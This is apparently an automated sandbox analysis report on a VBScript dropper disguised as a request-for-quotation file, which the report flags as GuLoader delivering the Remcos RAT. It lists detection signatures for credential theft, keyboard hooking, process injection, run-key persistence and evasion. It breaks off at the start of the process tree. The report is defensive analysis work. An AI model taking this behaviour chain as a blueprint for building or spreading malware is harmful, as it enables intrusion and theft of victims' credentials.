Windows
Analysis Report
RFQ.NO. S70-23Q-1474-CS-P.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6172 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 5768 cmdline: